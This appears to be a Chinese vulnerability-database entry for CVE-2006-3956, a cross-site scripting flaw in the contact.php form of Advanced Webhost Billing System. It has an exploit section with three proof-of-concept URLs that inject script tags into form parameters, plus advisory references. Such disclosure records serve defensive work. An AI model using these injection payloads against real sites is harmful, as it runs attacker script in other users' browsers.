Advanced Webhost Billing System 'contact.php'跨站脚本执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193956 漏洞类型 跨站脚本
发布时间 2006-07-29 更新时间 2006-08-03
CVE编号 CVE-2006-3956 CNNVD-ID CNNVD-200608-021
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-021
|漏洞详情
AdvancedWebhostBillingSystem(AWBS)是一款在线购物使用的计费系统。AWBS的contact.php脚本实现上存在输入验证漏洞,远程攻击者可以利用这些漏洞执行跨站脚本执行攻击,以客户端当前用户权限执行恶意脚本代码。
|漏洞EXP
AWBS=Advanced Webhost Billing System

Exploit;

1.)http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1

2.)http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='
><script>alert('XSS Vulnerability')%3B</script>&Message=1

3.)http://[site adres]/action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</t
extarea><script>alert('XSS Vulnerability')%3B</script>

.newbinaryfile

newbinaryfile (at) gmail (dot) com [email concealed]
|参考资料

来源:BUGTRAQ
名称:20060729XSSvulnerabilityonAWBS
链接:http://www.securityfocus.com/archive/1/archive/1/441532/100/0/threaded
来源:SECUNIA
名称:21296
链接:http://secunia.com/advisories/21296
来源:XF
名称:awbs-contact-xss(28069)
链接:http://xforce.iss.net/xforce/xfdb/28069
来源:BID
名称:19226
链接:http://www.securityfocus.com/bid/19226
来源:OSVDB
名称:27629
链接:http://www.osvdb.org/27629
来源:VUPEN
名称:ADV-2006-3061
链接:http://www.frsirt.com/english/advisories/2006/3061
来源:SREASON
名称:1317
链接:http://securityreason.com/securityalert/1317